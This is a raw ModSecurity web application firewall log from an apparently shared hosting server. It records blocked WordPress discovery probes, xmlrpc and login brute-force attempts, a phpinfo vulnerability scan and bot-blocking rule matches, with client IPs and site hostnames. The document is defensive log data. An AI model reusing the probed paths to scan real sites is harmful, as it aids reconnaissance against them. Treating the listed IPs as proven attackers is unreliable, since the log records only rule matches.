[Tue May 26 14:43:21.918955 2026] [security2:error] [pid 636820:tid 637039] [client 94.103.90.150:50731] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkMa_r6oOphPch7B-IKQAAAFk"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:43:22.354961 2026] [core:error] [pid 636820:tid 637047] [client 5.255.231.35:46190] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:43:22.354988 2026] [core:error] [pid 636820:tid 637047] [client 5.255.231.35:46190] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:43:22.754012 2026] [security2:error] [pid 636820:tid 637067] [client 74.7.175.185:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahVkMq_r6oOphPch7B-IOAAAAHU"]
[Tue May 26 14:43:22.754942 2026] [security2:error] [pid 636820:tid 637072] [client 74.7.175.185:49372] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahVkMq_r6oOphPch7B-IMwAAekw"]
[Tue May 26 14:43:22.910056 2026] [security2:error] [pid 636820:tid 637058] [client 74.7.228.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com.taotechservices.com"] [uri "/index.php"] [unique_id "ahVkMq_r6oOphPch7B-IQwAAAGw"]
[Tue May 26 14:43:22.911008 2026] [security2:error] [pid 636820:tid 637071] [client 74.7.228.15:39808] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVkMq_r6oOphPch7B-IQQAAeVk"]
[Tue May 26 14:43:23.042964 2026] [security2:error] [pid 636820:tid 636960] [client 82.102.18.118:33906] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVkM6_r6oOphPch7B-IUgAAAAo"]
[Tue May 26 14:43:23.108177 2026] [security2:error] [pid 636820:tid 637054] [client 192.99.8.15:55052] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.99.8.15" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkM6_r6oOphPch7B-IUwAAAGg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:43:23.111299 2026] [security2:error] [pid 636820:tid 637054] [client 192.99.8.15:55052] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkM6_r6oOphPch7B-IUwAAAGg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:43:23.209832 2026] [security2:error] [pid 636820:tid 637050] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkMq_r6oOphPch7B-ITQAAAGQ"]
[Tue May 26 14:43:23.580217 2026] [security2:error] [pid 636820:tid 637032] [client 82.102.18.118:33920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.18.102.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "baka-bau.com"] [uri "/xmlrpc.php"] [unique_id "ahVkM6_r6oOphPch7B-IYQAAAFI"]
[Tue May 26 14:43:23.679049 2026] [security2:error] [pid 636820:tid 636965] [client 202.141.83.254:19856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkM6_r6oOphPch7B-IbAAAAA8"]
[Tue May 26 14:43:23.679180 2026] [security2:error] [pid 636820:tid 636965] [client 202.141.83.254:19856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkM6_r6oOphPch7B-IbAAAAA8"]
[Tue May 26 14:43:24.065706 2026] [security2:error] [pid 636820:tid 637022] [client 82.102.18.118:33934] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNK_r6oOphPch7B-IdAAAAEg"]
[Tue May 26 14:43:24.384730 2026] [security2:error] [pid 636820:tid 637070] [client 82.102.18.118:52362] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNK_r6oOphPch7B-IewAAAHg"]
[Tue May 26 14:43:24.711930 2026] [security2:error] [pid 636820:tid 636950] [client 82.102.18.118:52374] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNK_r6oOphPch7B-IggAAAAA"]
[Tue May 26 14:43:24.774639 2026] [security2:error] [pid 636820:tid 637058] [client 195.178.110.34:49844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_phpinfo.php"] [unique_id "ahVkNK_r6oOphPch7B-IhgAAAGw"]
[Tue May 26 14:43:25.060852 2026] [security2:error] [pid 636820:tid 636984] [client 82.102.18.118:52388] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNa_r6oOphPch7B-ImQAAACI"]
[Tue May 26 14:43:25.284406 2026] [security2:error] [pid 636820:tid 637038] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkNK_r6oOphPch7B-IjwAAAFg"]
[Tue May 26 14:43:26.401480 2026] [security2:error] [pid 636820:tid 637048] [client 82.102.18.118:52394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNq_r6oOphPch7B-IsQAAAGI"]
[Tue May 26 14:43:26.757576 2026] [security2:error] [pid 636820:tid 636974] [client 82.102.18.118:52402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVkNq_r6oOphPch7B-IvwAAABg"]
[Tue May 26 14:43:27.094731 2026] [security2:error] [pid 636820:tid 636991] [client 82.102.18.118:52408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVkN6_r6oOphPch7B-I0AAAACk"]
[Tue May 26 14:43:27.116379 2026] [security2:error] [pid 636820:tid 636950] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkNq_r6oOphPch7B-IvQAAAAA"]
[Tue May 26 14:43:27.782054 2026] [security2:error] [pid 636820:tid 637006] [client 82.102.18.118:52416] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVkN6_r6oOphPch7B-I5gAAADg"]
[Tue May 26 14:43:27.904015 2026] [security2:error] [pid 636820:tid 637046] [client 202.125.83.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkN6_r6oOphPch7B-I3gAAAGA"]
[Tue May 26 14:43:28.142341 2026] [security2:error] [pid 636820:tid 636956] [client 82.102.18.118:52420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVkOK_r6oOphPch7B-I6wAAAAY"]
[Tue May 26 14:43:28.494926 2026] [security2:error] [pid 636820:tid 637045] [client 82.102.18.118:52426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVkOK_r6oOphPch7B-I9AAAAF8"]
[Tue May 26 14:43:28.497462 2026] [security2:error] [pid 636820:tid 636938] [remote 82.196.25.136:42798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVkOK_r6oOphPch7B-I8AAAbnU"]
[Tue May 26 14:43:28.831965 2026] [security2:error] [pid 636820:tid 637066] [client 82.102.18.118:52442] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVkOK_r6oOphPch7B-I_wAAAHQ"]
[Tue May 26 14:43:29.092192 2026] [security2:error] [pid 636820:tid 636997] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkOK_r6oOphPch7B-I-AAAAC8"]
[Tue May 26 14:43:29.169343 2026] [security2:error] [pid 636820:tid 637007] [client 82.102.18.118:52446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVkOa_r6oOphPch7B-JFQAAADk"]
[Tue May 26 14:43:29.524356 2026] [security2:error] [pid 636820:tid 636998] [client 82.102.18.118:52462] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "baka-bau.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVkOa_r6oOphPch7B-JHAAAADA"]
[Tue May 26 14:43:31.402035 2026] [security2:error] [pid 636820:tid 636984] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkOq_r6oOphPch7B-JSAAAACI"]
[Tue May 26 14:43:33.376272 2026] [security2:error] [pid 636820:tid 636955] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkPK_r6oOphPch7B-JegAAAAU"]
[Tue May 26 14:43:34.130830 2026] [security2:error] [pid 636820:tid 636986] [client 202.141.83.254:19961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkPq_r6oOphPch7B-JlwAAACQ"]
[Tue May 26 14:43:34.130918 2026] [security2:error] [pid 636820:tid 636986] [client 202.141.83.254:19961] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkPq_r6oOphPch7B-JlwAAACQ"]
[Tue May 26 14:43:34.371672 2026] [security2:error] [pid 636820:tid 637042] [client 49.13.164.148:39034] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVkPa_r6oOphPch7B-JlQAAAFw"], referer: https://thegoodsporting.com
[Tue May 26 14:43:35.595341 2026] [security2:error] [pid 636820:tid 637036] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkP6_r6oOphPch7B-JvgAAAFY"]
[Tue May 26 14:43:36.483151 2026] [security2:error] [pid 636820:tid 637058] [client 216.244.66.241:34138] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/advertising/detail/110407/"] [unique_id "ahVkQK_r6oOphPch7B-J8AAAAGw"]
[Tue May 26 14:43:36.483301 2026] [security2:error] [pid 636820:tid 637058] [client 216.244.66.241:34138] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/advertising/detail/110407/"] [unique_id "ahVkQK_r6oOphPch7B-J8AAAAGw"]
[Tue May 26 14:43:37.061873 2026] [security2:error] [pid 636820:tid 636834] [remote 74.7.241.58:53116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVkQa_r6oOphPch7B-KBwAADQ0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:43:37.430266 2026] [security2:error] [pid 636820:tid 637002] [client 216.244.66.241:34142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/books/search_list.html"] [unique_id "ahVkQa_r6oOphPch7B-KGAAAADQ"]
[Tue May 26 14:43:37.430378 2026] [security2:error] [pid 636820:tid 637002] [client 216.244.66.241:34142] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/books/search_list.html"] [unique_id "ahVkQa_r6oOphPch7B-KGAAAADQ"]
[Tue May 26 14:43:37.903076 2026] [security2:error] [pid 636820:tid 636950] [client 114.119.131.206:59713] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/type/video"] [unique_id "ahVkQa_r6oOphPch7B-KKAAAAAA"], referer: http://haddingtonwines.com/blog-video-post
[Tue May 26 14:43:37.914482 2026] [security2:error] [pid 636820:tid 637007] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkQa_r6oOphPch7B-KGwAAADk"]
[Tue May 26 14:43:38.656012 2026] [security2:error] [pid 636820:tid 636997] [client 216.244.66.241:34146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/brand/hamilton/news/245950"] [unique_id "ahVkQq_r6oOphPch7B-KQwAAAC8"]
[Tue May 26 14:43:38.656156 2026] [security2:error] [pid 636820:tid 636997] [client 216.244.66.241:34146] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/brand/hamilton/news/245950"] [unique_id "ahVkQq_r6oOphPch7B-KQwAAAC8"]
[Tue May 26 14:43:39.076381 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkQq_r6oOphPch7B-KQgAAACU"]
[Tue May 26 14:43:39.741548 2026] [security2:error] [pid 636820:tid 637060] [client 216.244.66.241:34150] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkQ6_r6oOphPch7B-KYQAAAG4"]
[Tue May 26 14:43:39.741694 2026] [security2:error] [pid 636820:tid 637060] [client 216.244.66.241:34150] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkQ6_r6oOphPch7B-KYQAAAG4"]
[Tue May 26 14:43:40.538738 2026] [security2:error] [pid 636820:tid 637019] [client 216.244.66.241:34152] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRK_r6oOphPch7B-KfAAAAEU"]
[Tue May 26 14:43:40.538831 2026] [security2:error] [pid 636820:tid 637019] [client 216.244.66.241:34152] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRK_r6oOphPch7B-KfAAAAEU"]
[Tue May 26 14:43:40.617207 2026] [security2:error] [pid 636820:tid 636872] [remote 121.200.216.55:54886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVkRK_r6oOphPch7B-KegAAFDM"]
[Tue May 26 14:43:41.348382 2026] [security2:error] [pid 636820:tid 637034] [client 216.244.66.241:34164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRa_r6oOphPch7B-KlwAAAFQ"]
[Tue May 26 14:43:41.348488 2026] [security2:error] [pid 636820:tid 637034] [client 216.244.66.241:34164] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRa_r6oOphPch7B-KlwAAAFQ"]
[Tue May 26 14:43:41.736378 2026] [security2:error] [pid 636820:tid 636964] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkRa_r6oOphPch7B-KlgAAAA4"]
[Tue May 26 14:43:42.228294 2026] [security2:error] [pid 636820:tid 637035] [client 216.244.66.241:34180] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRq_r6oOphPch7B-KpgAAAFU"]
[Tue May 26 14:43:42.228402 2026] [security2:error] [pid 636820:tid 637035] [client 216.244.66.241:34180] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkRq_r6oOphPch7B-KpgAAAFU"]
